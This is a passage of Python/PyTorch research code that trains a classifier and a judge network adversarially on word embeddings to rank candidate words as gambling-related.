x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n \r\n #x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n print(x_temp.shape)\r\n y=np.concatenate((y,y_temp),axis=0)\r\n x=np.concatenate((x,x_temp),axis=0)\r\n y_temp=y_train[np.where(y_train==0)]\r\n x_temp=x_train[np.where(y_train==0)]\r\n print(x_temp.shape)\r\n x_temp,y_temp=same_class_augmentation(x_temp,y_temp)\r\n \r\n print(x_temp.shape)\r\n y=np.concatenate((y,y_temp),axis=0)\r\n x=np.concatenate((x,x_temp),axis=0)\r\n# =============================================================================\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# y=np.concatenate((y,y_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# x=np.concatenate((x,x_temp),axis=0)\r\n# =============================================================================\r\n ran_index=np.random.permutation(np.shape(y)[0])\r\n \r\n y=y[ran_index]\r\n x=x[ran_index]\r\n \r\n X_train,X_test,Y_train,Y_test=train_test_split(x,y,test_size=test_size,random_state=20170816)\r\n #print(X_train.shape)\r\n\r\n# =============================================================================\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# 
Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# Y_test=np.concatenate((Y_test,y_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# X_test=np.concatenate((X_test,x_test_temp),axis=0)\r\n# =============================================================================\r\n \r\n sc=StandardScaler()\r\n \r\n sc.fit(X_train)\r\n \r\n X_train_nor=sc.transform(X_train)\r\n X_test_nor=sc.transform(X_test)\r\n \r\n z_train=z_train[np.where(y_train<0)]\r\n x_grey=x_train[np.where(y_train<0)]\r\n X_grey_nor=sc.transform(x_grey)\r\n return X_train_nor, Y_train,X_test_nor,Y_test,X_grey_nor,z_train\r\n\r\nclass Classfier(torch.nn.Module):\r\n def __init__(self,args):\r\n super(Classfier, self).__init__()\r\n self.layer1 = torch.nn.Conv1d(1,10,3)\r\n #self.act1 = torch.nn.ReLU()\r\n #self.layer2 = torch.nn.Conv1d(in_channels=20, out_channels=10, kernel_size=1)\r\n self.layer2 = torch.nn.Conv1d(10,10,3)\r\n self.maxpool1=torch.nn.MaxPool1d(2)\r\n self.flatten = torch.nn.Flatten()\r\n self.layer3 = torch.nn.Linear((global_input_size-4)*5,1)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n \r\n def forward(self, x):\r\n #x = self.drop_out1(x)\r\n x = F.relu(self.layer1(x))\r\n #print(x.shape)\r\n x = F.relu(self.layer2(x))\r\n #print(x.shape)\r\n x = self.maxpool1(x)\r\n #print(x.shape)\r\n x = self.flatten(x)\r\n #print(x.shape)\r\n x = self.layer3(x)\r\n # print(x.shape)\r\n\r\n\r\n return x\r\n# =============================================================================\r\n# class Classfier(torch.nn.Module):\r\n# def __init__(self):\r\n# super(Classfier, self).__init__()\r\n# self.layer1 = torch.nn.Linear(128,32)\r\n# self.layer2 = torch.nn.Linear(32,1)\r\n# #self.model.to(device)\r\n# #self.epoches = epoches\r\n# \r\n# def forward(self, x):\r\n# #x = 
self.drop_out1(x)\r\n# x = F.relu(self.layer1(x))\r\n# x = self.layer2(x)\r\n# # print(x.shape)\r\n# \r\n# \r\n# return x\r\n# =============================================================================\r\n\r\n# =============================================================================\r\n# class Classfier(torch.nn.Module):\r\n# def __init__(self,args):\r\n# super(Classfier, self).__init__()\r\n# self.layer1 = torch.nn.Linear(args.input_size,64)\r\n# self.layer2 = torch.nn.Linear(64,32)\r\n# self.layer3 = torch.nn.Linear(32,args.output_size)\r\n# torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n# torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n# torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n# #self.model.to(device)\r\n# #self.epoches = epoches\r\n# \r\n# def forward(self, x):\r\n# #x = self.drop_out1(x)\r\n# x = F.relu(self.layer1(x))\r\n# x = F.relu(self.layer2(x))\r\n# x = self.layer3(x)\r\n# # print(x.shape)\r\n# \r\n# \r\n# return x\r\n# =============================================================================\r\n\r\n\r\nclass Classfier_2layer(torch.nn.Module):\r\n def __init__(self,args):\r\n super(Classfier_2layer, self).__init__()\r\n self.layer1 = torch.nn.Linear(args.input_size,32)\r\n #self.layer2 = torch.nn.Linear(32,16)\r\n self.layer3 = torch.nn.Linear(32,args.output_size)\r\n torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n #torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n \r\n def forward(self, x):\r\n #x = self.drop_out1(x)\r\n x = F.relu(self.layer1(x))\r\n #x = F.relu(self.layer2(x))\r\n x = self.layer3(x)\r\n # print(x.shape)\r\n\r\n\r\n return x\r\n\r\nclass Classfier_1layer(torch.nn.Module):\r\n def __init__(self,args):\r\n super(Classfier_1layer, self).__init__()\r\n self.layer1 = torch.nn.Linear(args.input_size,1)\r\n #self.layer2 = torch.nn.Linear(32,16)\r\n #self.layer3 = torch.nn.Linear(32,args.output_size)\r\n torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n #torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n #torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n \r\n def forward(self, x):\r\n #x = self.drop_out1(x)\r\n #x = F.relu(self.layer1(x))\r\n #x = F.relu(self.layer2(x))\r\n x = self.layer1(x)\r\n # print(x.shape)\r\n\r\n\r\n return x\r\n\r\n\r\nclass Juger(torch.nn.Module):\r\n def __init__(self):\r\n super(Juger, self).__init__()\r\n self.layer1 = torch.nn.Conv1d(1,10,3)\r\n #self.act1 = torch.nn.ReLU()\r\n #self.layer2 = torch.nn.Conv1d(in_channels=20, out_channels=10, kernel_size=1)\r\n self.layer2 = torch.nn.Conv1d(10,10,3)\r\n self.maxpool1=torch.nn.MaxPool1d(2)\r\n self.flatten = torch.nn.Flatten()\r\n self.layer3 = torch.nn.Linear((global_input_size-4)*5,1)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n self.layer4=torch.nn.Linear(2,1)\r\n torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n torch.nn.init.xavier_uniform_(self.layer4.weight)\r\n \r\n def forward(self, x,y=None):\r\n #x = self.drop_out1(x)\r\n #print(x.shape)\r\n x = F.relu(self.layer1(x))\r\n #print(x.shape)\r\n x = F.relu(self.layer2(x))\r\n #print(x.shape)\r\n x = self.maxpool1(x)\r\n #print(x.shape)\r\n x = self.flatten(x)\r\n #print(x.shape)\r\n \r\n x = self.layer3(x)\r\n #print(x.shape)\r\n #output=x\r\n if y is not None:\r\n #print(x.shape)\r\n 
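# the layer3 score is concatenated with the candidate label y, and layer4 (2 -> 1) produces the final judge logit\r\n            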
#print(y.shape)\r\n #print(torch.cat((x,y),dim=1).shape)\r\n x=self.layer4(torch.cat((x,y),dim=1))\r\n\r\n return x\r\n\r\n\r\nclass JugerProject(torch.nn.Module):\r\n def __init__(self):\r\n super(JugerProject, self).__init__()\r\n self.layer1 = torch.nn.Conv1d(1,10,3)\r\n #self.act1 = torch.nn.ReLU()\r\n #self.layer2 = torch.nn.Conv1d(in_channels=20, out_channels=10, kernel_size=1)\r\n self.layer2 = torch.nn.Conv1d(10,10,3)\r\n self.maxpool1=torch.nn.MaxPool1d(2)\r\n self.flatten = torch.nn.Flatten()\r\n #self.dropout=torch.nn.Dropout(0.5)\r\n self.layer3 = torch.nn.Linear((global_input_size-4)*5,1)\r\n #self.model.to(device)\r\n #self.epoches = epoches\r\n self.layer4=torch.nn.Linear(1, (global_input_size-4)*5)\r\n torch.nn.init.xavier_uniform_(self.layer1.weight)\r\n torch.nn.init.xavier_uniform_(self.layer2.weight)\r\n torch.nn.init.xavier_uniform_(self.layer3.weight)\r\n torch.nn.init.xavier_uniform_(self.layer4.weight)\r\n \r\n def forward(self, x,y=None):\r\n #x = self.drop_out1(x)\r\n #print(x.shape)\r\n x = F.relu(self.layer1(x))\r\n #print(x.shape)\r\n x = F.relu(self.layer2(x))\r\n #print(x.shape)\r\n x = self.maxpool1(x)\r\n #print(x.shape)\r\n x = self.flatten(x)\r\n #x= self.dropout(x)\r\n #print(x.shape)\r\n output = self.layer3(x)\r\n #print(x.shape)\r\n #output=x\r\n if y is not None:\r\n #print(x.shape)\r\n #print(y.shape)\r\n #print(torch.cat((x,y),dim=1).shape)\r\n ly=self.layer4(y)\r\n #print(ly.shape)\r\n #print(output.shape)\r\n #print(x.shape)\r\n output+=torch.sum(ly*x, dim=1, keepdim=True) \r\n #print(output.shape)\r\n #print(output)\r\n return output\r\n\r\n\r\nclass Model:\r\n def __init__(self,args):\r\n if args.num_of_layer==1:\r\n self.model1 = Classfier_1layer(args)\r\n elif args.num_of_layer==2:\r\n self.model1 = Classfier_2layer(args)\r\n else:\r\n self.model1 = Classfier(args)\r\n self.model1.to(device)\r\n if args.juger_type==1:\r\n self.model2 = Juger()\r\n else:\r\n self.model2 = JugerProject()\r\n self.model2.to(device)\r\n self.epoches = args.epoch\r\n\r\n \r\n def train(self, train_set, unlab_set, elv, args, pretrain=False):\r\n #loss_func = nn.BCEWithLogitsLoss() #nn.CrossEntropyLoss()\r\n loss_func =nn.MSELoss(reduce=False)\r\n #loss_func =nn.MSELoss(reduce=False, size_average=False)\r\n #optimizer = torch.optim.RMSprop(self.model1.parameters(),lr=0.0003)\r\n #optimizer = torch.optim.Adam(self.model1.parameters(),lr=args.lr, betas=(0.9, 0.99),weight_decay=0.01)\r\n optimizer = torch.optim.Adam(self.model1.parameters(),lr=args.lr, betas=(0.9, 0.99),weight_decay=0.05)\r\n optimizer_policy_gradient = torch.optim.Adam(self.model1.parameters(),lr=args.lr, betas=(0.9, 0.99),weight_decay=0.05)\r\n #scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer,T_max = (100 // 9) + 1)\r\n scheduler =torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.1, patience=args.patience, verbose=False, threshold=args.threshold, threshold_mode='rel', cooldown=args.cooldown, min_lr=0.0000001, eps=1e-08)\r\n scheduler_policy_gradient =torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer_policy_gradient, mode='min', factor=0.1, patience=args.patience, verbose=False, threshold=args.threshold, threshold_mode='rel', cooldown=args.cooldown, min_lr=0.0000001, eps=1e-08)\r\n #scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=30, gamma=0.1)\r\n #optimizer = optim.SGD(self.model1.parameters(), lr=0.001)\r\n if pretrain==True:\r\n checkpoint = torch.load('./model.pth.tar')\r\n for name in checkpoint ['model'].keys():\r\n print(name)\r\n # 
here, checkpoint is a dict with the keys you defined before\r\n self.model1.load_state_dict(checkpoint['model'])\r\n optimizer.load_state_dict(checkpoint['opt'])\r\n\r\n loss_func_judge = nn.BCEWithLogitsLoss()#nn.MSELoss(reduce=True, size_average=True)#nn.BCELoss()#nn.MSELoss(reduce=True, size_average=True)#nn.CrossEntropyLoss()\r\n #optimizer = torch.optim.RMSprop(self.model.parameters(),lr=0.0003)\r\n optimizer_judge = torch.optim.Adam(self.model2.parameters(),lr=args.lr, betas=(0.9, 0.99),weight_decay=0.05)\r\n scheduler_judge =torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer_judge, mode='min', factor=0.1, patience=args.patience, verbose=True, threshold=args.threshold, threshold_mode='rel', cooldown=args.cooldown, min_lr=0.0000001, eps=1e-08)\r\n for epoch in range(self.epoches):\r\n total_loss = 0\r\n total_loss1 = 0\r\n reward=0\r\n # total_loss2 = 0\r\n if epoch<50:\r\n for x in range(1000):# 每轮随机样本训练1000次\r\n# =============================================================================\r\n# train_temp = random.choices(train_set,k=5)\r\n# # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n# #print(len(train_temp))\r\n# #print(len(train_temp[0]))\r\n# train_temp=np.array(train_temp)\r\n# features = torch.tensor(train_temp[:,:-1], dtype=torch.float, device=device)\r\n# #print(features.shape)\r\n# # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n# label = torch.tensor(train_temp[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n# optimizer.zero_grad()\r\n# \r\n# pred = self.model1(features) # [batch, out_dim]\r\n# #print(pred.shape)\r\n# #print(label.shape)\r\n# loss = loss_func(pred, label)\r\n# loss.backward()\r\n# total_loss += loss\r\n# optimizer.step()\r\n# =============================================================================\r\n train_temp = random.choices(train_set,k=20)\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n train_temp=np.array(train_temp)\r\n features = torch.tensor(train_temp[:,:-1], dtype=torch.float, device=device).unsqueeze(1)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n label = torch.tensor(train_temp[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n optimizer.zero_grad()\r\n \r\n pred = self.model1(features) # [batch, out_dim]\r\n #print(pred.shape)\r\n #print(label.shape)\r\n loss = loss_func(pred, label)\r\n loss.mean().backward()\r\n total_loss += loss.mean().item()\r\n optimizer.step()\r\n scheduler.step(total_loss/1000) \r\n if epoch%10==0:\r\n print(\"Classfier: in epoch {} loss {}\".format(epoch, total_loss/2000))\r\n #print(\"Current Learning Rate is {}!\".format(optimizer.param_groups[0]['lr']))\r\n else:\r\n if epoch==30:\r\n torch.save(self.model1.state_dict(),\"model.pth\") # 保存参数\r\n #model = model() # 代码中创建网络结构\r\n params = torch.load(\"model.pth\") # 加载参数\r\n params['layer4.weight']=self.model2.layer4.weight\r\n params['layer4.bias']=self.model2.layer4.bias\r\n self.model2.load_state_dict(params) # 应用到网络结构中\r\n if epoch<120:\r\n for x in range(1000):# 每轮随机样本训练1000次\r\n if random.random()<=0.5:\r\n train_temp = random.choices(train_set,k=20)\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n train_temp=np.array(train_temp)\r\n features = torch.tensor(train_temp[:,:-1],dtype=torch.float, device=device).unsqueeze(1)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n label = torch.tensor(np.ones((20)), 
dtype=torch.float, device=device).unsqueeze(1)\r\n optimizer_judge.zero_grad()\r\n #pred = self.model2(features)\r\n #print(features.dtype)\r\n if args.juger_type==1: \r\n _y=torch.tensor(train_temp[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n else:\r\n _y=torch.tensor(train_temp[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n #print(_y.dtype)\r\n pred = self.model2(features,_y) # [batch, out_dim]\r\n #print(pred.shape)\r\n #print(pred.shape)\r\n #print(label.shape)\r\n #print(pred)\r\n #print(label)\r\n loss_judge = loss_func_judge(pred, label)\r\n loss_judge.backward()\r\n total_loss += loss_judge\r\n optimizer_judge.step()\r\n else:\r\n train_temp = random.choices(unlab_set,k=20)\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n train_temp=np.array(train_temp)\r\n features = torch.tensor(train_temp, \r\n dtype=torch.float, device=device).unsqueeze(1)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n label = torch.tensor(np.zeros((20)), dtype=torch.float, device=device).unsqueeze(1)\r\n optimizer_judge.zero_grad()\r\n \r\n #pred = self.model2(features)\r\n #print(pred.shape)\r\n #print(features.dtype)\r\n if args.juger_type==1: \r\n _y=self.model1(torch.tensor(train_temp, dtype=torch.float, device=device).unsqueeze(1))\r\n else:\r\n _y=self.model1(torch.tensor(train_temp, dtype=torch.float, device=device).unsqueeze(1))\r\n _y=torch.round(torch.sigmoid(_y))\r\n #_y=_y.squeeze(1)\r\n #print(_y.dtype)\r\n #print(_y.dtype)\r\n \r\n pred = self.model2(features,_y) # [batch, out_dim]\r\n #print(pred)\r\n #print(label)\r\n #print(pred.shape)\r\n #print(label.shape)\r\n loss_judge = loss_func_judge(pred, label)\r\n loss_judge.backward()\r\n total_loss += loss_judge\r\n optimizer_judge.step()\r\n scheduler_judge.step(total_loss/1000)\r\n if epoch%10==0: \r\n print(\"Judger: in epoch {} loss {}\".format(epoch, total_loss/2000))\r\n else:\r\n\r\n for x in range(1000):# 每轮随机样本训练1000次\r\n #print(x)\r\n train_temp1 = random.choices(train_set,k=10)\r\n train_temp1=np.array(train_temp1)\r\n# =============================================================================\r\n# # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n# train_temp1=np.array(train_temp1)\r\n# features1 = torch.tensor(train_temp1[:,:-1],dtype=torch.float, device=device).unsqueeze(1)\r\n# \r\n# #print(features.shape)\r\n# # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n# label1 = torch.tensor(np.ones((10)), dtype=torch.float, device=device).unsqueeze(1)\r\n# _y1=torch.tensor(train_temp1[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n# #print(_y1.shape)\r\n# #print(_y.dtype)\r\n# pred1 = self.model2(features1,_y1) # [batch, out_dim]\r\n# \r\n# \r\n# =============================================================================\r\n train_temp2 = random.choices(unlab_set,k=10)\r\n train_temp2=np.array(train_temp2)\r\n# =============================================================================\r\n# # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n# features2 = torch.tensor(train_temp2, \r\n# dtype=torch.float, device=device).unsqueeze(1)\r\n# #print(features.shape)\r\n# # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n# label2 = torch.tensor(np.zeros((10)), dtype=torch.float, device=device).unsqueeze(1)\r\n# _y2=torch.round(torch.sigmoid(self.model1(features2)))\r\n# #print(_y2.shape)\r\n# pred2 = self.model2(features2,_y2) # 
[batch, out_dim]\r\n# \r\n# if_label=torch.cat((label1,label2))\r\n# all_judge_prob=torch.cat((pred1,pred2))\r\n# loss_judge=loss_func_judge(all_judge_prob,if_label)\r\n# optimizer_judge.zero_grad()\r\n# loss_judge.backward()\r\n# total_loss1 += loss_judge\r\n# optimizer_judge.step() \r\n# =============================================================================\r\n \r\n \r\n optimizer.zero_grad()\r\n features3 = torch.tensor(train_temp1[:,:-1],dtype=torch.float, device=device).unsqueeze(1)\r\n \r\n #print(features3.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n #label3 = torch.tensor(train_temp1[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n pred3 = torch.sigmoid(self.model1(features3))\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n #print(pred3)\r\n # print(label3)\r\n #loss_label = loss_func(pred3, label3)\r\n #print(loss_label)\r\n \r\n #print(pred3.shape)\r\n #print(_y1.shape)\r\n inverse_operation=torch.ones([10,1],dtype=torch.float, device=device)\r\n _y1=torch.tensor(train_temp1[:,-1], dtype=torch.float, device=device).unsqueeze(1)\r\n loss_label = abs(pred3-abs(_y1-inverse_operation))\r\n #print(loss_label.shape)\r\n #train_temp = random.choice(unlab_set)\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n #features2 = torch.tensor(list(train_temp), \r\n # dtype=torch.float, device=device).unsqueeze(0).unsqueeze(0)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n #label2 = self.model1(features2)\r\n #\r\n# =============================================================================\r\n# optimizer_judge.zero_grad()\r\n# loss_label.backward()\r\n# optimizer_judge.step()\r\n# =============================================================================\r\n # RNN的input要求shape为[batch, seq_len, embed_dim],由于名字为变长,也不准备好将其填充为定长,因此batch_size取1,将取的名字放入单个元素的list中。\r\n features4 = torch.tensor(train_temp2, \r\n dtype=torch.float, device=device).unsqueeze(1)\r\n #print(features.shape)\r\n # torch要求计算损失时,只提供类别的索引值,不需要one-hot表示\r\n label4=torch.round(torch.sigmoid(self.model1(features4)))\r\n #label4 = torch.tensor(fake_label, dtype=torch.float, device=device)\r\n #pred4 = self.model1(features4)\r\n #prob_unlabel_istrue_temp=torch.sigmoid(self.model2(features2,_y2)).cpu().detach().numpy().tolist()\r\n #prob_unlabel_istrue=torch.tensor(prob_unlabel_istrue_temp, dtype=torch.float, device=device)\r\n #print(pred4.shape)\r\n #print(label4.shape)\r\n #loss_unlabel_temp = prob_unlabel_istrue\r\n #print(loss_unlabel_temp.shape)\r\n #print(loss_unlabel_temp.shape)\r\n #print(prob_unlabel_istrue.shape)\r\n loss_unlabel=torch.sigmoid(self.model2(features4,label4))\r\n #print(loss_unlabel.shape)\r\n #print(loss_label.shape)\r\n loss_total = 1-(torch.cat((loss_label,loss_unlabel),0)-0.5)\r\n #loss_total = loss_label+loss_unlabel\r\n #print(loss_total)\r\n \r\n \r\n # [batch, out_dim]\r\n #print(pred.shape)\r\n #print(pred.shape)\r\n #print(label.shape)\r\n #loss_judge = loss_func_judge(pred, label)\r\n loss_total.mean().backward()\r\n #total_loss2 += loss_total.mean()\r\n reward+=loss_total.mean()\r\n optimizer.step()\r\n #reward+=loss_total.mean()\r\n if epoch%5==0:\r\n print(\"Judger: in epoch {} loss {}\".format(epoch, total_loss1/1000.0))\r\n print(\"Classfier: in epoch {} reward {}\".format(epoch, reward/1000))\r\n if epoch%30==0:\r\n self.evaluate(elv)\r\n #print(loss_total)\r\n scheduler_policy_gradient.step(reward/1000)\r\n scheduler_judge.step(total_loss1/1000)\r\n def 
evaluate(self, test_set):\r\n        with torch.no_grad():  # no gradient computation during evaluation\r\n            features = torch.tensor(test_set[:,:-1], dtype=torch.float, device=device).unsqueeze(1)\r\n            final_prediction = self.model1(features)\r\n            final_pred_np = final_prediction.cpu().detach().numpy()\r\n            temp=final_pred_np.squeeze()\r\n            print('Evaluating: test AUC is {}'.format(roc_auc_score(test_set[:,-1],temp )))\r\n            # Pearson correlation between predictions and ground-truth labels\r\n            return np.corrcoef(final_pred_np.squeeze(), test_set[:,-1])[0, 1]\r\n    \r\n    def predict(self, name,word):\r\n        name_tensor = torch.tensor(name, dtype=torch.float, device=device).unsqueeze(0).unsqueeze(0)\r\n        with torch.no_grad():\r\n            out = self.model1(name_tensor)\r\n            out = torch.argmax(out).item()\r\n            category = 'gamble' if out == 0 else 'no-gamble'\r\n            print('{} is {}'.format(word, category))\r\n\r\n\r\ndef main(args):\r\n    model5=Model(args)\r\n    training_data1=np.concatenate((X1,np.expand_dims(Y1, axis=1)),axis=1)\r\n    training_data2=np.concatenate((X2,np.expand_dims(Y2, axis=1)),axis=1)\r\n    model5.train(training_data1,X3,training_data2,args)\r\n    torch.save(model5, './adv_learning_model.pkl')\r\n    predict_result=torch.zeros(len(X3),1,dtype=torch.float32)\r\n    with torch.no_grad():\r\n        # Predict in chunks of 100 rows to bound memory use.\r\n        for i in range(int(len(X3)/100)+1):\r\n            predict_result[i*100:min((i+1)*100,len(X3))]=model5.model1(torch.tensor(X3[i*100:min((i+1)*100,len(X3)),:], dtype=torch.float, device=device).unsqueeze(1))\r\n    return predict_result\r\n\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.metrics import roc_auc_score\r\nimport pickle\r\nif __name__ == \"__main__\":\r\n    X1, Y1,X2,Y2,X3,Z1 = get_data(0.01)\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument(\"--c\", type=float, default=0.01)\r\n    parser.add_argument(\"--lr\", type=float, default=0.001)\r\n    parser.add_argument(\"--batchsize\", type=int, default=1)\r\n    parser.add_argument(\"--epoch\", type=int, default=200)\r\n    parser.add_argument(\"--input_size\", type=int, default=768)\r\n    parser.add_argument(\"--output_size\", type=int, default=1)\r\n    parser.add_argument(\"--patience\", type=int, default=4)\r\n    parser.add_argument(\"--threshold\", type=float, default=0.00001)\r\n    parser.add_argument(\"--cooldown\", type=int, default=0)\r\n    parser.add_argument(\"--num_of_layer\", type=int, default=3)\r\n    parser.add_argument(\"--juger_type\", type=int, default=2)\r\n    args = parser.parse_args()\r\n\r\n    args.patience=3\r\n    args.cooldown=2\r\n    args.num_of_layer=3\r\n    model5=Model(args)\r\n    training_data1=np.concatenate((X1,np.expand_dims(Y1, axis=1)),axis=1)\r\n    training_data2=np.concatenate((X2,np.expand_dims(Y2, axis=1)),axis=1)\r\n    model5.train(training_data1,X3,training_data2,args)\r\n    
#grid_search_40_2000.append(model5.evaluate(training_date2))\r\n \r\n #print(model5.model1(torch.tensor(X3[1], dtype=torch.float, device=device)))\r\n torch.save(model5, './adv_learning_model.pkl')\r\n with open('../nlp/gamble_new_candidate_words.pickle', \"rb\") as input_file:\r\n word_index = pickle.load(input_file)\r\n idxs_index=[]\r\n idxs_words=[]\r\n for key in word_index:\r\n if key in Z1:\r\n idxs_index.append(np.where(Z1==key)[0][0])\r\n idxs_words.append(key)\r\n current_input=X3[idxs_index,:]\r\n predict_result=torch.zeros(len(current_input),1,dtype=torch.float32)\r\n with torch.no_grad():\r\n for i in range(int(len(current_input)/100)+1):\r\n predict_result[i*100:min((i+1)*100,len(current_input))]=model5.model1(torch.tensor(current_input[i*100:min((i+1)*100,len(current_input)),:], dtype=torch.float, device=device).unsqueeze(1))\r\n\r\n pred_adv_np=predict_result.cpu().detach().numpy()\r\n sort_of_adv=sorted(range(len(pred_adv_np)), key=lambda k: -pred_adv_np[k])\r\n output_adv=np.array(idxs_words)[sort_of_adv[:500]]\r\n \r\n with open('../nlp/wahaha_words.pickle', \"rb\") as input_file:\r\n word_index = pickle.load(input_file)\r\n idxs_index=[]\r\n idxs_words=[]\r\n for key in word_index:\r\n if key in Z1:\r\n idxs_index.append(np.where(Z1==key)[0][0])\r\n idxs_words.append(key)\r\n current_input=X3[idxs_index,:]\r\n 